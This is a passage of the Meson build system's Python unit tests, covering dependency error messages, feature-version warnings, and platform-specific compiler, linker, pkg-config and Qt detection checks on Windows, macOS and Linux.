def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents does not output
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertNotRegex(out, match)
@skipIfNoPkgconfig
def test_dependency(self):
if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0:
raise unittest.SkipTest('zlib not found with pkg-config')
a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"),
("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"),
("dependency('zlib', version : 1)", "Item must be a list or one of <class 'str'>"),
("dependency('zlib', required : 1)", "[Rr]equired.*boolean"),
("dependency('zlib', method : 1)", "[Mm]ethod.*string"),
("dependency('zlibfail')", self.dnf),)
for contents, match in a:
self.assertMesonRaises(contents, match)
def test_apple_frameworks_dependency(self):
if not is_osx():
raise unittest.SkipTest('only run on macOS')
self.assertMesonRaises("dependency('appleframeworks')",
"requires at least one module")
def test_extraframework_dependency_method(self):
code = "dependency('python', method : 'extraframework')"
if not is_osx():
self.assertMesonRaises(code, self.dnf)
else:
# Python2 framework is always available on macOS
self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES')
def test_sdl2_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('sdl2-config'):
raise unittest.SkipTest('sdl2-config found')
self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf)
if shutil.which('pkg-config'):
self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf)
with no_pkgconfig():
# Look for pkg-config, cache it, then
# Use cached pkg-config without erroring out, then
# Use cached pkg-config to error out
code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \
"dependency('foobarrr2', method : 'pkg-config', required : false)\n" \
"dependency('sdl2', method : 'pkg-config')"
self.assertMesonRaises(code, self.nopkg)
def test_gnustep_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('gnustep-config'):
raise unittest.SkipTest('gnustep-config found')
self.assertMesonRaises("dependency('gnustep')",
"(requires a Objc compiler|{})".format(self.dnf),
langs = ['objc'])
def test_wx_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets')", self.dnf)
self.assertMesonOutputs("dependency('wxwidgets', required : false)",
"Run-time dependency .*WxWidgets.* found: .*NO.*")
def test_wx_dependency(self):
if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets', modules : 1)",
"module argument is not a string")
def test_llvm_dependency(self):
self.assertMesonRaises("dependency('llvm', modules : 'fail')",
"(required.*fail|{})".format(self.dnf))
def test_boost_notfound_dependency(self):
# Can be run whether or not Boost is found
self.assertMesonRaises("dependency('boost', modules : 1)",
"module.*not a string")
self.assertMesonRaises("dependency('boost', modules : 'fail')",
"(fail.*not found|{})".format(self.dnf))
def test_boost_BOOST_ROOT_dependency(self):
# Test BOOST_ROOT; can be run whether or not Boost is found
self.assertMesonRaises("dependency('boost')",
"(BOOST_ROOT.*absolute|{})".format(self.dnf),
override_envvars = {'BOOST_ROOT': 'relative/path'})
def test_dependency_invalid_method(self):
code = '''zlib_dep = dependency('zlib', required : false)
zlib_dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, ".* is not a config-tool dependency")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_pkgconfig_variable('foo')
'''
self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal")
def test_objc_cpp_detection(self):
'''
Test that when we can't detect objc or objcpp, we fail gracefully.
'''
env = get_fake_env()
try:
env.detect_objc_compiler(MachineChoice.HOST)
env.detect_objcpp_compiler(MachineChoice.HOST)
except EnvironmentException:
code = "add_languages('objc')\nadd_languages('objcpp')"
self.assertMesonRaises(code, "Unknown compiler")
return
raise unittest.SkipTest("objc and objcpp found, can't test detection failure")
def test_subproject_variables(self):
'''
Test that:
1. The correct message is outputted when a not-required dep is not
found and the fallback subproject is also not found.
2. A not-required fallback dependency is not found because the
subproject failed to parse.
3. A not-found not-required dep with a fallback subproject outputs the
correct message when the fallback subproject is found but the
variable inside it is not.
4. A fallback dependency is found from the subproject parsed in (3)
5. The correct message is outputted when the .wrap file is missing for
a sub-subproject.
'''
tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables')
out = self.init(tdir, inprocess=True)
self.assertRegex(out, r"Subproject directory not found and .*nosubproj.wrap.* file not found")
self.assertRegex(out, r'Function does not take positional arguments.')
self.assertRegex(out, r'WARNING:.* Dependency .*subsubproject.* not found but it is available in a sub-subproject.')
self.assertRegex(out, r'Subproject directory not found and .*subsubproject.wrap.* file not found')
self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*')
def test_exception_exit_status(self):
'''
Test exit status on python exception
'''
tdir = os.path.join(self.unit_test_dir, '21 exit status')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'})
self.assertEqual(cm.exception.returncode, 2)
self.wipe()
def test_dict_requires_key_value_pairs(self):
self.assertMesonRaises("dict = {3, 'foo': 'bar'}",
'Only key:value pairs are valid in dict construction.')
self.assertMesonRaises("{'foo': 'bar', 3}",
'Only key:value pairs are valid in dict construction.')
def test_dict_forbids_duplicate_keys(self):
self.assertMesonRaises("dict = {'a': 41, 'a': 42}",
'Duplicate dictionary key: a.*')
def test_dict_forbids_integer_key(self):
self.assertMesonRaises("dict = {3: 'foo'}",
'Key must be a string.*')
def test_using_too_recent_feature(self):
# Here we use a dict, which was introduced in 0.47.0
self.assertMesonOutputs("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.46.0')
def test_using_recent_feature(self):
# Same as above, except the meson version is now appropriate
self.assertMesonDoesNotOutput("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.47')
def test_using_too_recent_feature_dependency(self):
self.assertMesonOutputs("dependency('pcap', required: false)",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.41.0')
def test_vcs_tag_featurenew_build_always_stale(self):
'https://github.com/mesonbuild/meson/issues/3904'
vcs_tag = '''version_data = configuration_data()
version_data.set('PROJVER', '@VCS_TAG@')
vf = configure_file(output : 'version.h.in', configuration: version_data)
f = vcs_tag(input : vf, output : 'version.h')
'''
msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*'
self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43')
def test_missing_subproject_not_required_and_required(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub2 = subproject('not-found-subproject', required: true)",
""".*Subproject "subprojects/not-found-subproject" required but not found.*""")
def test_get_variable_on_not_found_project(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub1.get_variable('naaa')",
"""Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""")
def test_version_checked_before_parsing_options(self):
'''
https://github.com/mesonbuild/meson/issues/5281
'''
options = "option('some-option', type: 'foo', value: '')"
match = 'Meson version is.*but project requires >=2000'
self.assertMesonRaises("", match, meson_version='>=2000', options=options)
def test_assert_default_message(self):
self.assertMesonRaises("k1 = 'a'\n" +
"assert({\n" +
" k1: 1,\n" +
"}['a'] == 2)\n",
r"Assert failed: {k1 : 1}\['a'\] == 2")
def test_wrap_nofallback(self):
self.assertMesonRaises("dependency('notfound', fallback : ['foo', 'foo_dep'])",
r"Dependency \'notfound\' not found and fallback is disabled",
extra_args=['--wrap-mode=nofallback'])
def test_message(self):
self.assertMesonOutputs("message('Array:', ['a', 'b'])",
r"Message:.* Array: \['a', 'b'\]")
def test_warning(self):
self.assertMesonOutputs("warning('Array:', ['a', 'b'])",
r"WARNING:.* Array: \['a', 'b'\]")
def test_override_dependency_twice(self):
self.assertMesonRaises("meson.override_dependency('foo', declare_dependency())\n" +
"meson.override_dependency('foo', declare_dependency())",
"""Tried to override dependency 'foo' which has already been resolved or overridden""")
@unittest.skipIf(is_windows(), 'zlib is not available on Windows')
def test_override_resolved_dependency(self):
self.assertMesonRaises("dependency('zlib')\n" +
"meson.override_dependency('zlib', declare_dependency())",
"""Tried to override dependency 'zlib' which has already been resolved or overridden""")
@unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)")
class WindowsTests(BasePlatformTests):
'''
Tests that should run on Cygwin, MinGW, and MSVC
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows')
@unittest.skipIf(is_cygwin(), 'Test only applicable to Windows')
def test_find_program(self):
'''
Test that Windows-specific edge-cases in find_program are functioning
correctly. Cannot be an ordinary test because it involves manipulating
PATH to point to a directory with Python scripts.
'''
testdir = os.path.join(self.platform_test_dir, '8 find program')
# Find `cmd` and `cmd.exe`
prog1 = ExternalProgram('cmd')
self.assertTrue(prog1.found(), msg='cmd not found')
prog2 = ExternalProgram('cmd.exe')
self.assertTrue(prog2.found(), msg='cmd.exe not found')
self.assertPathEqual(prog1.get_path(), prog2.get_path())
# Find cmd with an absolute path that's missing the extension
cmd_path = prog2.get_path()[:-4]
prog = ExternalProgram(cmd_path)
self.assertTrue(prog.found(), msg='{!r} not found'.format(cmd_path))
# Finding a script with no extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script'))
self.assertTrue(prog.found(), msg='test-script not found')
# Finding a script with an extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py'))
self.assertTrue(prog.found(), msg='test-script-ext.py not found')
# Finding a script in PATH
os.environ['PATH'] += os.pathsep + testdir
# Finding a script in PATH w/o extension works and adds the interpreter
# (check only if `.PY` is in PATHEXT)
if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]:
prog = ExternalProgram('test-script-ext')
self.assertTrue(prog.found(), msg='test-script-ext not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Finding a script in PATH with extension works and adds the interpreter
prog = ExternalProgram('test-script-ext.py')
self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Ensure that WindowsApps gets removed from PATH
path = os.environ['PATH']
if 'WindowsApps' not in path:
username = os.environ['USERNAME']
appstore_dir = r'C:\Users\{}\AppData\Local\Microsoft\WindowsApps'.format(username)
path = os.pathsep + appstore_dir
path = ExternalProgram._windows_sanitize_path(path)
self.assertNotIn('WindowsApps', path)
def test_ignore_libs(self):
'''
Test that find_library on libs that are to be ignored returns an empty
array of arguments. Must be a unit test because we cannot inspect
ExternalLibraryHolder from build files.
'''
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Not using MSVC')
# Exact-match the set so this test must be updated whenever ignore_libs
# changes, and so the current list itself is verified.
self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'})
for l in cc.ignore_libs:
self.assertEqual(cc.find_library(l, env, []), [])
def test_rc_depends_files(self):
testdir = os.path.join(self.platform_test_dir, '5 resources')
# resource compiler depfile generation is not yet implemented for msvc
env = get_fake_env(testdir, self.builddir, self.prefix)
depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'}
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Test compile_resources(depend_file:)
# Changing mtime of sample.ico should rebuild prog
self.utime(os.path.join(testdir, 'res', 'sample.ico'))
self.assertRebuiltTarget('prog')
# Test depfile generation by compile_resources
# Changing mtime of resource.h should rebuild myres.rc and then prog
if depfile_works:
self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h'))
self.assertRebuiltTarget('prog')
self.wipe()
if depfile_works:
testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of resource.h should rebuild myres_1.rc and then prog_1
self.utime(os.path.join(testdir, 'res', 'resource.h'))
self.assertRebuiltTarget('prog_1')
def test_msvc_cpp17(self):
testdir = os.path.join(self.unit_test_dir, '45 vscpp17')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
try:
self.init(testdir)
except subprocess.CalledProcessError:
# According to Python docs, output is only stored when
# using check_output. We don't use it, so we can't check
# that the output is correct (i.e. that it failed due
# to the right reason).
return
self.build()
def test_install_pdb_introspection(self):
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
self.init(testdir)
installed = self.introspect('--installed')
files = [os.path.basename(path) for path in installed.values()]
self.assertTrue('prog.pdb' in files)
def _check_ld(self, name: str, lang: str, expected: str) -> None:
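# Point the per-language {lang}_ld environment variable (looked up via
# BinaryTable.evarMap) at `name` and check that compiler detection picks
# a linker whose id matches `expected`.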
if not shutil.which(name):
raise unittest.SkipTest('Could not find {}.'.format(name))
envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]]
# Also test a deprecated variable if there is one.
if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP:
envvars.append(
mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
try:
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('Could not find a compiler for {}'.format(lang))
self.assertEqual(comp.linker.id, expected)
def test_link_environment_variable_lld_link(self):
env = get_fake_env()
comp = env.detect_c_compiler(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('lld-link', 'c', 'lld-link')
def test_link_environment_variable_link(self):
env = get_fake_env()
comp = env.detect_c_compiler(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('link', 'c', 'link')
def test_link_environment_variable_optlink(self):
env = get_fake_env()
comp = env.detect_c_compiler(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('optlink', 'c', 'optlink')
@skip_if_not_language('rust')
def test_link_environment_variable_rust(self):
self._check_ld('link', 'rust', 'link')
@skip_if_not_language('d')
def test_link_environment_variable_d(self):
env = get_fake_env()
comp = env.detect_d_compiler(MachineChoice.HOST)
if comp.id == 'dmd':
raise unittest.SkipTest('meson cannot reliably make DMD use a different linker.')
self._check_ld('lld-link', 'd', 'lld-link')
def test_pefile_checksum(self):
try:
import pefile
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('pefile module not found')
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir, extra_args=['--buildtype=release'])
self.build()
# Test that binaries have a non-zero checksum
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
cc_id = cc.get_id()
ld_id = cc.get_linker_id()
dll = glob(os.path.join(self.builddir, '*mycpplib.dll'))[0]
exe = os.path.join(self.builddir, 'cppprog.exe')
for f in (dll, exe):
pe = pefile.PE(f)
msg = 'PE file: {!r}, compiler: {!r}, linker: {!r}'.format(f, cc_id, ld_id)
if cc_id == 'clang-cl':
# Latest clang-cl tested (7.0) does not write checksums out
self.assertFalse(pe.verify_checksum(), msg=msg)
else:
# Verify that a valid checksum was written by all other compilers
self.assertTrue(pe.verify_checksum(), msg=msg)
def test_qt5dependency_vscrt(self):
'''
Test that qt5 dependencies use the debug module suffix when b_vscrt is
set to 'mdd'
'''
# Verify that the `b_vscrt` option is available
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if 'b_vscrt' not in cc.base_options:
raise unittest.SkipTest('Compiler does not support setting the VS CRT')
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake') and not is_ci():
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output and not is_ci():
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Setup with /MDd
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Db_vscrt=mdd'])
# Verify that we're linking to the debug versions of Qt DLLs
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build qt5core.exe: cpp_LINKER.*Qt5Cored.lib', contents)
self.assertIsNotNone(m, msg=contents)
@unittest.skipUnless(is_osx(), "requires Darwin")
class DarwinTests(BasePlatformTests):
'''
Tests that should run on macOS
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx')
def test_apple_bitcode(self):
'''
Test that -fembed-bitcode is correctly added while compiling and
-bitcode_bundle is added while linking when b_bitcode is true and not
when it is false. This can't be an ordinary test case because we need
to inspect the compiler database.
'''
testdir = os.path.join(self.platform_test_dir, '7 bitcode')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.id != 'clang':
raise unittest.SkipTest('Not using Clang on OSX')
# Try with bitcode enabled
out = self.init(testdir, extra_args='-Db_bitcode=true')
# Warning was printed
self.assertRegex(out, 'WARNING:.*b_bitcode')
# Compiler options were added
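# (except for shared_module() sources, which must not get bitcode flags,
# as the assertions below verify)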
for compdb in self.get_compdb():
if 'module' in compdb['file']:
self.assertNotIn('-fembed-bitcode', compdb['command'])
else:
self.assertIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
# Linker options were added
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNotNone(m, msg=contents)
# Try with bitcode disabled
self.setconf('-Db_bitcode=false')
# Regenerate build
self.build()
for compdb in self.get_compdb():
self.assertNotIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNone(m, msg=contents)
def test_apple_bitcode_modules(self):
'''
Same as above, just for shared_module()
'''
testdir = os.path.join(self.common_test_dir, '152 shared module resolving symbol in executable')
# Ensure that it builds even with bitcode enabled
self.init(testdir, extra_args='-Db_bitcode=true')
self.build()
self.run_tests()
def _get_darwin_versions(self, fname):
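# `otool -L` prints the queried file on the first line, then each linked
# dylib with a '(compatibility version X, current version Y)' suffix;
# the regex extracts both version fields from the second line of output.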
fname = os.path.join(self.builddir, fname)
out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True)
m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1])
self.assertIsNotNone(m, msg=out)
return m.groups()
@skipIfNoPkgconfig
def test_library_versioning(self):
'''
Ensure that compatibility_version and current_version are set correctly
'''
testdir = os.path.join(self.platform_test_dir, '2 library versions')
self.init(testdir)
self.build()
targets = {}
for t in self.introspect('--targets'):
targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename']
self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0'))
self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0'))
self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0'))
self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0'))
self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1'))
def test_duplicate_rpath(self):
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
# We purposely pass a duplicate rpath to Meson, in order
# to ascertain that Meson does not call install_name_tool
# with duplicate -delete_rpath arguments, which would
# lead to erroring out on installation
env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"}
self.init(testdir, override_envvars=env)
self.build()
self.install()
def test_removing_unused_linker_args(self):
testdir = os.path.join(self.common_test_dir, '108 has arg')
env = {'CFLAGS': '-L/tmp -L /var/tmp -headerpad_max_install_names -Wl,-export_dynamic'}
self.init(testdir, override_envvars=env)
@unittest.skipUnless(not is_windows(), "requires something Unix-like")
class LinuxlikeTests(BasePlatformTests):
'''
Tests that should run on Linux, macOS, and *BSD
'''
def test_basic_soname(self):
'''
Test that the soname is set correctly for shared libraries. This can't
be an ordinary test case because we need to run `readelf` and actually
check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '4 shared')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'libmylib.so')
soname = get_soname(lib1)
self.assertEqual(soname, 'libmylib.so')
def test_custom_soname(self):
'''
Test that the soname is set correctly for shared libraries when
a custom prefix and/or suffix is used. This can't be an ordinary test
case because we need to run `readelf` and actually check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '25 library versions')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix')
soname = get_soname(lib1)
self.assertEqual(soname, 'prefixsomelib.suffix')
def test_pic(self):
'''
Test that -fPIC is correctly added to static libraries when b_staticpic
is true and not when it is false. This can't be an ordinary test case
because we need to inspect the compiler database.
'''
if is_windows() or is_cygwin() or is_osx():
raise unittest.SkipTest('PIC not relevant')
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir)
compdb = self.get_compdb()
self.assertIn('-fPIC', compdb[0]['command'])
self.setconf('-Db_staticpic=false')
# Regenerate build
self.build()
compdb = self.get_compdb()
self.assertNotIn('-fPIC', compdb[0]['command'])
def test_pkgconfig_gen(self):
'''
Test that generated pkg-config files can be found and have the correct
version and link args. This can't be an ordinary test case because we
need to run pkg-config outside of a Meson build file.
https://github.com/mesonbuild/meson/issues/889
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
self.assertTrue(foo_dep.found())
self.assertEqual(foo_dep.get_version(), '1.0')
self.assertIn('-lfoo', foo_dep.get_link_args())
self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar')
self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data')
libhello_nolib = PkgConfigDependency('libhello_nolib', env, kwargs)
self.assertTrue(libhello_nolib.found())
self.assertEqual(libhello_nolib.get_link_args(), [])
self.assertEqual(libhello_nolib.get_compile_args(), [])
def test_pkgconfig_gen_deps(self):
'''
Test that generated pkg-config files correctly handle dependencies
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
privatedir1 = self.privatedir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1})
privatedir2 = self.privatedir
env = {
'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2]),
'PKG_CONFIG_SYSTEM_LIBRARY_PATH': '/usr/lib',
}
self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env)
# pkg-config strips some duplicated flags so we have to parse the
# generated file ourselves.
expected = {
'Requires': 'libexposed',
'Requires.private': 'libfoo >= 1.0',
'Libs': '-L${libdir} -llibmain -pthread -lcustom',
'Libs.private': '-lcustom2 -L${libdir} -llibinternal',
'Cflags': '-I${includedir} -pthread -DCUSTOM',
}
if is_osx() or is_haiku():
expected['Cflags'] = expected['Cflags'].replace('-pthread ', '')
with open(os.path.join(privatedir2, 'dependency-test.pc')) as f:
matched_lines = 0
for line in f:
parts = line.split(':', 1)
if parts[0] in expected:
key = parts[0]
val = parts[1].strip()
expected_val = expected[key]
self.assertEqual(expected_val, val)
matched_lines += 1
self.assertEqual(len(expected), matched_lines)
cmd = ['pkg-config', 'requires-test']
out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'requires-private-test']
out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'pub-lib-order']
out = self._run(cmd + ['--libs'], override_envvars=env).strip().split()
self.assertEqual(out, ['-llibmain2', '-llibinternal'])
def test_pkgconfig_uninstalled(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
self.build()
os.environ['PKG_CONFIG_LIBDIR'] = os.path.join(self.builddir, 'meson-uninstalled')
if is_cygwin():
os.environ['PATH'] += os.pathsep + self.builddir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir)
self.build()
self.run_tests()
def test_pkg_unfound(self):
testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig')
self.init(testdir)
with open(os.path.join(self.privatedir, 'somename.pc')) as f:
pcfile = f.read()
self.assertFalse('blub_blob_blib' in pcfile)
def test_vala_c_warnings(self):
'''
Test that no warnings are emitted for C code generated by Vala. This
can't be an ordinary test case because we need to inspect the compiler
database.
https://github.com/mesonbuild/meson/issues/864
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '5 target glib')
self.init(testdir)
compdb = self.get_compdb()
vala_command = None
c_command = None
for each in compdb:
if each['file'].endswith('GLib.Thread.c'):
vala_command = each['command']
elif each['file'].endswith('GLib.Thread.vala'):
continue
elif each['file'].endswith('retcode.c'):
c_command = each['command']
else:
m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file'])
raise AssertionError(m)
self.assertIsNotNone(vala_command)
self.assertIsNotNone(c_command)
# -w suppresses all warnings, should be there in Vala but not in C
self.assertIn(" -w ", vala_command)
self.assertNotIn(" -w ", c_command)
# -Wall enables all warnings, should be there in C but not in Vala
self.assertNotIn(" -Wall ", vala_command)
self.assertIn(" -Wall ", c_command)
# -Werror converts warnings to errors, should always be there since it's
# injected by an unrelated piece of code and the project has werror=true
self.assertIn(" -Werror ", vala_command)
self.assertIn(" -Werror ", c_command)
@skipIfNoPkgconfig
def test_qtdependency_pkgconfig_detection(self):
'''
Test that qt4 and qt5 detection with pkgconfig works.
'''
# Verify Qt4 or Qt5 can be found with pkg-config
qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore'])
qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core'])
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=pkg-config'])
# Confirm that the dependency was found with pkg-config
mesonlog = self.get_meson_log()
if qt4 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)\n')
if qt5 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)\n')
@skip_if_not_base_option('b_sanitize')
def test_generate_gir_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
def test_qt5dependency_qmake_detection(self):
'''
Test that qt5 detection with qmake works. This can't be an ordinary
test case because it involves setting the environment.
'''
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake'):
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output:
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Disable pkg-config codepath and force searching with qmake/qmake-qt5
